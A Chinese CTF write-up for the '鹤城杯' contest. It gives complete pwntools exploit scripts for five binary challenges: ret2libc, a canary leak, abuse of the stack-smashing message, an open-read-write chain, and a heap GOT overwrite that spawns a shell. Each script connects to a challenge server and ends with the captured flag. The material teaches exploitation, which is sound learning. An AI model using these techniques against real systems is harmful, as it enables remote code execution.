鹤城杯WP

前言

这次比赛就坑爹

一、babyof

无 PIE、无 canary 的栈溢出：第一次溢出用 puts(puts@got) 泄露 libc 地址并返回 main，第二次溢出直接打 ret2libc 即可。注意脚本里硬编码的 one_gadget 偏移只对某一个特定 libc 版本有效，换环境要重新算，或者直接用泄露出来的 system/"/bin/sh" 打。

# -*- coding:UTF-8 -*-

from pwn import *
from LibcSearcher import *

#context.log_level = 'debug'

#context
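context.arch = 'amd64'
# NOTE(review): the original also built a SigreturnFrame(kernel='amd64') here
# and discarded it; nothing in this exploit uses SROP, so that no-op was dropped.

binary = "./babyof"
# libc.so = "./libc-2.24.so"

# Short aliases over the global tube `p`. They only look `p` up when called,
# so they can be defined before the local/remote block below binds it.
sd = lambda s: p.send(s)                    # raw send, no newline
sl = lambda s: p.sendline(s)                # send followed by "\n"
rc = lambda s: p.recv(s)                    # receive up to s bytes
ru = lambda s: p.recvuntil(s)               # receive until marker s (inclusive)
rl = lambda: p.recvline()                   # receive one line
sa = lambda a, s: p.sendafter(a, s)         # wait for marker a, then send s
sla = lambda a, s: p.sendlineafter(a, s)    # wait for marker a, then sendline s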


#libcsearcher use
'''
malloc_hook = main_arena-0x10
obj = LibcSearcher("__malloc_hook", malloc_hook)
obj = LibcSearcher("fgets", 0Xd90)
libc_base = fgets-obj.dump('fgets')
system_addr = libc_base + obj.dump("system") #system
binsh_addr = libc_base + obj.dump("str_bin_sh")
log.info("system_addr:0x%x"%system_addr)
'''

#malloc_hook,main_aren Find
'''
python2 LibcOffset.py libc-2.23.so
'''

#without stripped
'''
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
system_plt = elf.plt['system']
read_plt = elf.plt['read']
main_addr = elf.sym['main']
'''


local = 0   # non-zero: run ./babyof locally; 0: talk to the challenge server

# The tube is created first, then the ELF is parsed for PLT/GOT lookups.
p = process(binary) if local else remote("182.116.62.85", "29394")
elf = ELF(binary)


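puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main_addr = 0x40066B          # non-PIE binary: return here after the leak for a second overflow

pop_rdi_ret = 0x400743        # pop rdi ; ret
ret = 0x400744                # ret  (used to realign the stack before system)

PADDING = "A" * (64 + 8)      # 64-byte buffer + saved rbp; this binary has no canary

# Stage 1: puts(puts@got) leaks a libc address, then main runs again so we
# can overflow a second time.
payload = ""
payload += PADDING
payload += p64(pop_rdi_ret)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(main_addr)

ru("Do you know how to do buffer overflow?\n")
sl(payload)
ru("I hope you win\n")
puts_addr = u64(rc(6).ljust(8, '\x00'))
log.info("puts_addr:0x%x" % puts_addr)

# Resolve libc from the leak. LibcSearcher matches on the low 12 bits of the
# symbol, so it may offer several candidates; pick the one the target runs.
obj = LibcSearcher("puts", puts_addr)
libc_base = puts_addr - obj.dump('puts')
system_addr = libc_base + obj.dump("system")
binsh_addr = libc_base + obj.dump("str_bin_sh")
log.info("system_addr:0x%x" % system_addr)
log.info("binsh_addr:0x%x" % binsh_addr)

# Sanity check: a wrong libc pick or a mangled leak almost always shows up as
# a base that is not page aligned; stop here rather than crash the target.
if libc_base & 0xfff:
    log.error("libc_base 0x%x is not page aligned - wrong libc or bad leak" % libc_base)

# Stage 2: system("/bin/sh").
# The original returned into a hard-coded one_gadget (libc_base + 0x10a41c),
# which is only valid for one specific libc build, and the system/binsh words
# it placed after that address were never reached. This chain uses only the
# symbols resolved from the leak. The extra `ret` keeps rsp 16-byte aligned
# when system() is entered (assuming the usual push rbp / sub rsp,0x40
# prologue implied by the 64+8 padding); newer glibc faults on an SSE move
# inside system() otherwise.
payload = ""
payload += PADDING
payload += p64(pop_rdi_ret)
payload += p64(binsh_addr)
payload += p64(ret)
payload += p64(system_addr)
payload += p64(main_addr)

ru("Do you know how to do buffer overflow?\n")
sl(payload)
p.interactive()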

#flag{3c011eeb10d8b8256d4eeb1a700262d3}

二、littleof

栈溢出但开了 canary，也比较直接：先发 0x48 字节，把 canary 最低位的 \x00 覆盖成 \x01，借程序回显把 canary 其余 7 个字节带出来（读回后减 1 还原），之后带着正确的 canary 做 ret2libc。至于栈上放一个 stdin 的 FILE 结构是什么用意没看明白。

# -*- coding:UTF-8 -*-

from pwn import *
from LibcSearcher import *

#context.log_level = 'debug'

#context
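context.arch = 'amd64'
# NOTE(review): the original also built a SigreturnFrame(kernel='amd64') here
# and discarded it; nothing in this exploit uses SROP, so that no-op was dropped.

binary = "./littleof"
# libc.so = "./libc-2.24.so"

# Short aliases over the global tube `p`. They only look `p` up when called,
# so they can be defined before the local/remote block below binds it.
sd = lambda s: p.send(s)                    # raw send, no newline
sl = lambda s: p.sendline(s)                # send followed by "\n"
rc = lambda s: p.recv(s)                    # receive up to s bytes
ru = lambda s: p.recvuntil(s)               # receive until marker s (inclusive)
rl = lambda: p.recvline()                   # receive one line
sa = lambda a, s: p.sendafter(a, s)         # wait for marker a, then send s
sla = lambda a, s: p.sendlineafter(a, s)    # wait for marker a, then sendline s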


#libcsearcher use
'''
malloc_hook = main_arena-0x10
obj = LibcSearcher("__malloc_hook", malloc_hook)
obj = LibcSearcher("fgets", 0Xd90)
libc_base = fgets-obj.dump('fgets')
system_addr = libc_base + obj.dump("system") #system
binsh_addr = libc_base + obj.dump("str_bin_sh")
log.info("system_addr:0x%x"%system_addr)
'''

#malloc_hook,main_aren Find
'''
python2 LibcOffset.py libc-2.23.so
'''

#without stripped
'''
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
system_plt = elf.plt['system']
read_plt = elf.plt['read']
main_addr = elf.sym['main']
'''


local = 0   # non-zero: run ./littleof locally; 0: talk to the challenge server

# The tube is created first, then the ELF is parsed for PLT/GOT lookups.
p = process(binary) if local else remote("182.116.62.85", "27056")
elf = ELF(binary)


def dbg():
    """Attach gdb to the live tube `p`, then block until the operator resumes."""
    gdb.attach(p)
    pause()   # keep the process parked so breakpoints can be set first

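puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main_addr = 0x400789          # non-PIE: return to main after the leak for another overflow

pop_rdi_ret = 0x400863        # pop rdi ; ret
ret = 0x400864                # ret (stack realignment before system)

BUF_TO_CANARY = 0x50 - 0x8    # bytes from the buffer start to the canary slot

# Stage 1: leak the canary. glibc keeps its lowest byte 0x00 so string
# functions stop at it; overwriting that byte with 0x01 makes the program's
# echo print the remaining 7 canary bytes right after our padding.
payload1 = ""
payload1 += "A" * BUF_TO_CANARY
payload1 += "\x01"

ru("Do you know how to do buffer overflow?\n")
sd(payload1)
ru("A" * BUF_TO_CANARY)
canary = u64(rc(8).ljust(8, '\x00')) - 0x1   # undo the 0x01 we wrote
log.info("canary:0x%x" % canary)
if canary & 0xff:
    log.error("canary 0x%x does not end in 0x00 - the echo was misparsed" % canary)

# Stage 2: with the canary intact, puts(puts@got) to leak libc, then back to
# main. main appears to read twice per round, so this goes straight in after
# the echo without waiting for the second prompt.
payload2 = ""
payload2 += "A" * BUF_TO_CANARY
payload2 += p64(canary)
payload2 += "A" * 0x8         # saved rbp
payload2 += p64(pop_rdi_ret)
payload2 += p64(puts_got)
payload2 += p64(puts_plt)
payload2 += p64(main_addr)
sd(payload2)
ru("I hope you win\n")
puts_addr = u64(rc(6).ljust(8, '\x00'))
log.info("puts_addr:0x%x" % puts_addr)

# LibcSearcher matches on the low 12 bits of the leak and may offer several
# candidates; pick the one the target actually runs.
obj = LibcSearcher("puts", puts_addr)
libc_base = puts_addr - obj.dump('puts')
system_addr = libc_base + obj.dump("system")
binsh_addr = libc_base + obj.dump("str_bin_sh")
log.info("system_addr:0x%x" % system_addr)
log.info("binsh_addr:0x%x" % binsh_addr)
if libc_base & 0xfff:
    log.error("libc_base 0x%x is not page aligned - wrong libc or bad leak" % libc_base)

# Stage 3: system("/bin/sh").
# The original returned into a hard-coded one_gadget (libc_base + 0x10a41c),
# valid for one specific libc build only, and the system/binsh words after it
# were never reached. This chain uses only symbols resolved from the leak;
# the extra `ret` keeps rsp 16-byte aligned at system()'s entry, which newer
# glibc requires (SSE move inside system() faults otherwise).
payload = ""
payload += "A" * BUF_TO_CANARY
payload += p64(canary)
payload += "A" * 0x8
payload += p64(pop_rdi_ret)
payload += p64(binsh_addr)
payload += p64(ret)
payload += p64(system_addr)
payload += p64(main_addr)

# The first read of this round is a throwaway; the one after "Try harder!"
# is the overflow.
ru("Do you know how to do buffer overflow?\n")
sl("A" * 8)
ru("Try harder!")
sd(payload)
p.interactive()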

#flag{3c011eeb10d8b8256d4eeb1a700262d3}

三、easyecho

利用 canary 的机制：检测到 canary 被篡改时，glibc 会在报错信息里打印程序名，而程序名指针在最开始就被放到了栈上，可以通过溢出改掉它。先输入 backdoor 触发后门逻辑，再把原本指向程序名的指针改成指向 flag 的指针，最后让函数返回触发 canary 检查即可把 flag 打印出来。注意这一招依赖运行环境的 glibc 仍从 argv[0] 取程序名来打印；较新的 glibc 只打印 `<unknown>`，该方法就失效了。

# -*- coding:UTF-8 -*-

from pwn import *
from LibcSearcher import *

#context.log_level = 'debug'

#context
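context.arch = 'amd64'
# NOTE(review): the original also built a SigreturnFrame(kernel='amd64') here
# and discarded it; nothing in this exploit uses SROP, so that no-op was dropped.

binary = "./easyecho"
# libc.so = "./libc-2.24.so"

# Short aliases over the global tube `p`. They only look `p` up when called,
# so they can be defined before the local/remote block below binds it.
sd = lambda s: p.send(s)                    # raw send, no newline
sl = lambda s: p.sendline(s)                # send followed by "\n"
rc = lambda s: p.recv(s)                    # receive up to s bytes
ru = lambda s: p.recvuntil(s)               # receive until marker s (inclusive)
rl = lambda: p.recvline()                   # receive one line
sa = lambda a, s: p.sendafter(a, s)         # wait for marker a, then send s
sla = lambda a, s: p.sendlineafter(a, s)    # wait for marker a, then sendline s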


#libcsearcher use
'''
malloc_hook = main_arena-0x10
obj = LibcSearcher("__malloc_hook", malloc_hook)
obj = LibcSearcher("fgets", 0Xd90)
libc_base = fgets-obj.dump('fgets')
system_addr = libc_base + obj.dump("system") #system
binsh_addr = libc_base + obj.dump("str_bin_sh")
log.info("system_addr:0x%x"%system_addr)
'''

#malloc_hook,main_aren Find
'''
python2 LibcOffset.py libc-2.23.so
'''

#without stripped
'''
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
system_plt = elf.plt['system']
read_plt = elf.plt['read']
main_addr = elf.sym['main']
'''

def lg(string, addr):
    """Print `string` and `addr` (as hex) on one line, bold red on black.

    The label is right-aligned in a 20-character field so successive leaks
    line up when several are printed in a row.
    """
    line = '\033[1;31;40m%20s-->0x%x\033[0m' % (string, addr)
    print(line)

local = 0   # non-zero: run ./easyecho locally; 0: talk to the challenge server

# The tube is created first, then the ELF is parsed.
p = process(binary) if local else remote("182.116.62.85", "24842")
elf = ELF(binary)

def dbg():
    """Attach gdb to the live tube `p`, then block until the operator resumes."""
    gdb.attach(p)
    pause()   # keep the process parked so breakpoints can be set first

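# Step 1: leak the PIE base. The 16-byte name is echoed back without a
# terminator, so the 6 bytes that follow it on the stack - presumably a code
# pointer at elfbase + 0xcf0 - come back with it.
ru("Name: ")
sl("a" * 0x10)
ru("a" * 0x10)
elfbase = u64(rc(6).ljust(8, '\x00')) - 0xcf0
lg('elfbase', elfbase)
# A PIE base is always page aligned; anything else means the echo was
# misparsed and the next overflow would only crash the target.
if elfbase & 0xfff:
    log.error("elfbase 0x%x is not page aligned - name echo misparsed" % elfbase)

# Step 2: "backdoor" enables the backdoor path, after which the input can
# overflow 0x168 bytes up to the stack slot holding the program-name pointer
# that the stack protector prints on failure. Aim it at the flag buffer in
# .bss (elfbase + 0x202040, per the writeup) instead.
FLAG_BUF = elfbase + 0x202040
ru("Input: ")
sl("backdoor")
ru("Input: ")
sl('PIG007NB' * 0x2D + p64(FLAG_BUF))

# Step 3: returning trips the canary check and glibc prints
# "*** stack smashing detected ***: <name> terminated" with our pointer as
# <name>, i.e. the flag.
# NOTE(review): this relies on a glibc that still prints argv[0] there;
# newer releases print "<unknown>" instead and the trick no longer works.
ru("Input: ")
sl("exitexit")

p.interactive()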

#flag{11dc27eed9e5277915c1dfd28992812b}

四、onecho

32 位栈溢出加 ORW。思路一：先泄露 libc，再用 read 把 "flag\0" 读到一块可读可写的地址（bss，或 libc 里的 __malloc_hook / __free_hook），然后 open → read → write 把 flag 打出来；脚本每一轮只调用一个函数然后返回 main，重新利用溢出做下一轮。思路二：通过 environ 泄露栈地址，直接用栈上已有的 flag 字符串指针去 open。两点注意：open 的 flags 应该用 O_RDONLY(0)，用 2(O_RDWR) 在 flag 文件对服务用户不可写时会直接失败；脚本假设 open 返回的 fd 是 3（进程只开着 0/1/2）。

# -*- coding:UTF-8 -*-

from pwn import *
from LibcSearcher import *
#context.log_level = 'debug'

#context
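context.arch = 'i386'
# NOTE(review): the original also built a SigreturnFrame(kernel='i386') here
# and discarded it; nothing in this exploit uses SROP, so that no-op was dropped.

binary = "./onecho"
context.binary = binary
# NOTE(review): the original also did libc = ELF('/lib/i386-linux-gnu/libc-2.27.so')
# here. That object is never referenced (libc is resolved with LibcSearcher
# from the puts leak), and the absolute host path made the script abort on
# any machine without that exact file, so the load was removed.
context.timeout = 0.2     # short recv timeout for the ru()/rc() helpers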



local = 1   # as published this runs against a local ./onecho; set to 0 for the server

# The tube is created first, then the ELF is parsed for PLT/GOT lookups.
p = process(binary) if local else remote("182.116.62.85", "24143")
elf = ELF(binary)

# Thin wrappers over the global tube `p`; `p` is resolved at call time.
def sd(s):
    """Raw send, no newline."""
    return p.send(s)


def sl(s):
    """Send `s` followed by a newline."""
    return p.sendline(s)


def rc(s):
    """Receive up to `s` bytes."""
    return p.recv(s)


def ru(s):
    """Receive until the marker `s` (inclusive)."""
    return p.recvuntil(s)


def rl():
    """Receive one line."""
    return p.recvline()


def sa(a, s):
    """Wait for marker `a`, then send `s`."""
    return p.sendafter(a, s)


def sla(a, s):
    """Wait for marker `a`, then sendline `s`."""
    return p.sendlineafter(a, s)


def uu32(data):
    """Unpack a 32-bit little-endian value from up to 4 bytes, zero-padded."""
    return u32(data.ljust(4, '\0'))


def uu64(data):
    """Unpack a 64-bit little-endian value from up to 8 bytes, zero-padded."""
    return u64(data.ljust(8, '\0'))


def u64Leakbase(offset):
    """Read until a 0x7f byte, take the 6-byte address ending there, subtract `offset`."""
    raw = ru("\x7f")[-6:]
    return u64(raw + '\0\0') - offset


def u32Leakbase(offset):
    """Read until a 0xf7 byte, take the 4-byte address ending there, subtract `offset`."""
    raw = ru("\xf7")[-4:]
    return u32(raw) - offset


def it():
    """Hand the tube over to the operator."""
    return p.interactive()


menu = "your choice>>"   # leftover menu prompt; unused by the onecho exploit

def dockerDbg():
    """Poke a listener on 127.0.0.1:30001, then block.

    Connecting and immediately closing exchanges no data; presumably it
    signals a gdb helper inside the challenge container to attach.
    """
    trigger = remote("127.0.0.1", 30001)
    trigger.close()
    pause()

def dbg():
    """Attach gdb to the live tube `p`, then block until the operator resumes."""
    gdb.attach(p)
    pause()   # keep the process parked so breakpoints can be set first

def lg(string, addr):
    """Print `string` and `addr` (as hex) on one line, bold red on black.

    The label is right-aligned in a 20-character field so successive leaks
    line up when several are printed in a row.
    """
    line = '\033[1;31;40m%20s-->0x%x\033[0m' % (string, addr)
    print(line)


def add():
    """Leftover from a menu-driven challenge: answer "Give me your choice" with 1.

    Not called anywhere in the onecho exploit; kept for reference only.
    """
    p.sendlineafter('Give me your choice : ', '1')

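main_addr = 0x0804973F
# pop ebx ; pop esi ; pop edi ; pop ebp ; ret  -- pads the frame with four
# junk words before the real call (the popped values are irrelevant)
pop_ebx_esi_edi_ebp_ret = 0x08049810

PADDING = 'PIG007NB' * 0x22           # name buffer up to the saved return address
BSS_SCRATCH = 0x0804C000              # writable page of the non-PIE binary used to stage the path
FLAG_PATH = 'flag\x00'                # NUL-terminated so open() stops at the name
O_RDONLY = 0
FLAG_FD = 3                           # see the comment at round 4


def _call(func, *args):
    """Build one overflow that calls `func(*args)` and then returns into main.

    Chain shape: padding | pop4 gadget | 4 junk words | func | main | args...
    When `func` returns it lands in main, which prompts for a name again, so
    the exploit issues one libc call per round instead of one long chain.
    """
    chain = PADDING
    chain += p32(pop_ebx_esi_edi_ebp_ret)
    chain += p32(1) * 4
    chain += p32(func)
    chain += p32(main_addr)
    chain += ''.join(p32(a) for a in args)
    return chain


ru('Input your name:')

# Round 1: puts(puts@got) -> libc leak; main runs again afterwards.
sl(_call(elf.plt['puts'], elf.got['puts']))
puts_addr = u32(ru('\xf7')[-4:])
obj = LibcSearcher("puts", puts_addr)
libc_base = puts_addr - obj.dump('puts')
lg('libc_base', libc_base)
# A wrong LibcSearcher candidate or a misparsed leak shows up as a base that
# is not page aligned; bail out before wasting the remaining rounds.
if libc_base & 0xfff:
    log.error("libc_base 0x%x is not page aligned - wrong libc or bad leak" % libc_base)

malloc_hook_addr = libc_base + obj.dump("__malloc_hook")
free_hook_addr = libc_base + obj.dump("__free_hook")   # RW libc memory, reused as a scratch buffer
read_addr = libc_base + obj.dump("read")
open_addr = libc_base + obj.dump("open")
write_addr = libc_base + obj.dump("write")
lg('__malloc_hook', malloc_hook_addr)
lg('free_hook_addr', free_hook_addr)
lg('read_addr', read_addr)
lg('open_addr', open_addr)
lg('write_addr', write_addr)

# Round 2: read(0, BSS_SCRATCH, 6), then feed it "flag\0" plus the newline
# that sendline appends (6 bytes total).
ru('Input your name:')
sl(_call(read_addr, 0, BSS_SCRATCH, 6))
sl(FLAG_PATH)

# Round 3: open("flag", O_RDONLY).
# The original passed 2 (O_RDWR); when the flag file is only readable by the
# service user that open() fails with EACCES and every later round works on
# a bogus descriptor. Read-only is all this needs.
ru('Input your name:')
sl(_call(open_addr, BSS_SCRATCH, O_RDONLY))

# Round 4: read(FLAG_FD, __free_hook, 0x30). FLAG_FD = 3 assumes only
# stdin/stdout/stderr were open before our open(); adjust it if the service
# holds extra descriptors.
ru('Input your name:')
sl(_call(read_addr, FLAG_FD, free_hook_addr, 0x30))

# Round 5: write(1, __free_hook, 0x30) -> the flag bytes land on stdout.
ru('Input your name:')
sl(_call(write_addr, 1, free_hook_addr, 0x30))

p.interactive()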

#flag{20baa3d800326274c965041777012d12}

五、pwn1

原题：CISCN 2018 supermarket。思路：先把商品 0 的描述从 0x80 改大到 0x90 让它重新分配，随后新建的商品 2 的结构体紧跟在商品 0 的新描述块之后，再编辑商品 0 的描述即可越界改写商品 2 的 description 指针——先指向 atoi@got 借 list 泄露 libc，再通过 edit 商品 2 把 atoi@got 改成 system，最后在菜单处输入 /bin/sh 即触发 system("/bin/sh")。

# -*- coding:UTF-8 -*-

from pwn import *
from LibcSearcher import *
#context.log_level = 'debug'

#context
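context.arch = 'i386'
# NOTE(review): the original also built a SigreturnFrame(kernel='i386') here
# and discarded it; nothing in this exploit uses SROP, so that no-op was dropped.

binary = "./task_supermarket"
context.binary = binary
# Local libc the binary links against. It is not used below: the remote libc
# is resolved with LibcSearcher from the atoi leak instead.
libc = ELF(context.binary.libc.path)
context.timeout = 0.2     # short recv timeout for the ru()/rc() helpers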



local = 0   # non-zero: run ./task_supermarket locally; 0: talk to the challenge server

# The tube is created first, then the ELF is parsed for PLT/GOT lookups.
p = process(binary) if local else remote("182.116.62.85", "27518")
elf = ELF(binary)

# Thin wrappers over the global tube `p`; `p` is resolved at call time.
def sd(s):
    """Raw send, no newline."""
    return p.send(s)


def sl(s):
    """Send `s` followed by a newline."""
    return p.sendline(s)


def rc(s):
    """Receive up to `s` bytes."""
    return p.recv(s)


def ru(s):
    """Receive until the marker `s` (inclusive)."""
    return p.recvuntil(s)


def rl():
    """Receive one line."""
    return p.recvline()


def sa(a, s):
    """Wait for marker `a`, then send `s`."""
    return p.sendafter(a, s)


def sla(a, s):
    """Wait for marker `a`, then sendline `s`."""
    return p.sendlineafter(a, s)


def uu32(data):
    """Unpack a 32-bit little-endian value from up to 4 bytes, zero-padded."""
    return u32(data.ljust(4, '\0'))


def uu64(data):
    """Unpack a 64-bit little-endian value from up to 8 bytes, zero-padded."""
    return u64(data.ljust(8, '\0'))


def u64Leakbase(offset):
    """Read until a 0x7f byte, take the 6-byte address ending there, subtract `offset`."""
    raw = ru("\x7f")[-6:]
    return u64(raw + '\0\0') - offset


def u32Leakbase(offset):
    """Read until a 0xf7 byte, take the 4-byte address ending there, subtract `offset`."""
    raw = ru("\xf7")[-4:]
    return u32(raw) - offset


def it():
    """Hand the tube over to the operator."""
    return p.interactive()


menu = 'your choice>>'   # prompt printed before every menu round

def dockerDbg():
    """Poke a listener on 127.0.0.1:30001, then block.

    Connecting and immediately closing exchanges no data; presumably it
    signals a gdb helper inside the challenge container to attach.
    """
    trigger = remote("127.0.0.1", 30001)
    trigger.close()
    pause()

def add(index, size, content):
    """Menu option 1: create an item named str(index) with price 10.

    `size` is the description allocation requested from the program and
    `content` the description text sent for it.
    """
    answers = (
        (menu, '1'),
        ('name:', str(index)),
        ('price:', '10'),
        ('descrip_size:', str(size)),
        ('description:', content),
    )
    for prompt, answer in answers:
        sla(prompt, answer)


def delete(index):
    """Menu option 2: remove the item named str(index)."""
    for prompt, answer in ((menu, '2'), ('name:', str(index))):
        sla(prompt, answer)


def list():
    """Menu option 3: make the program dump every item (name, price, description).

    The name mirrors the menu and shadows the builtin `list`; nothing in this
    script needs the builtin, but rename it before reusing this helper elsewhere.
    """
    choice = '3'
    sla(menu, choice)


def edit(index, size, content):
    """Menu option 5: replace item str(index)'s description with `content` at `size`."""
    answers = (
        (menu, '5'),
        ('name:', str(index)),
        ('descrip_size:', str(size)),
        ('description:', content),
    )
    for prompt, answer in answers:
        sla(prompt, answer)


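atoi_got = elf.got['atoi']

# Heap grooming (inferred from the sizes used, not verified against the binary):
# item 0 gets a 0x80-byte description and item 1 a 0x20-byte one; growing item
# 0's description to 0x90 makes the program reallocate it, and the item 2
# record created next appears to sit right after that new buffer, so writing
# item 0's description runs into item 2's record.
add(0, 0x80, 'PIG007NB' * 2)
add(1, 0x20, 'PIG007NB' * 2)
edit(0, 0x90, '')
add(2, 0x20, 'PIG007NB' * 2)

# Forge item 2's record: 16-byte name "2", price 20, descrip_size 0x20 and a
# description pointer aimed at atoi@got (same field order as add()'s prompts).
payload = ""
payload += '2'.ljust(16, '\x00')
payload += p32(20)
payload += p32(0x20)
payload += p32(atoi_got)
# 0x80 does not grow the current 0x90 allocation, so the buffer presumably
# stays in place and the write lands on item 2's record.
edit(0, 0x80, payload)

# list() now prints atoi's GOT entry as item 2's description -> libc leak.
list()
ru('2: price.20, des.')
atoi_addr = u32(rc(4).ljust(4, '\x00'))
log.info("atoi_addr:0x%x" % atoi_addr)

obj = LibcSearcher('atoi', atoi_addr)
libc_base = atoi_addr - obj.dump('atoi')
system_addr = libc_base + obj.dump('system')
log.info("system_addr:0x%x" % system_addr)
# A wrong LibcSearcher candidate or a misparsed leak shows up as a base that
# is not page aligned; stop before overwriting the GOT with garbage.
if libc_base & 0xfff:
    log.error("libc_base 0x%x is not page aligned - wrong libc or bad leak" % libc_base)

# Editing item 2 with its recorded size writes through the forged pointer:
# atoi@got := system. The menu choice is parsed with atoi(), so sending
# "/bin/sh" as the next choice becomes system("/bin/sh").
edit(2, 0x20, p32(system_addr))
sla(menu, '/bin/sh')

p.interactive()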
#flag{03b1baaab2a949db11f8b1c02a4f7ab6}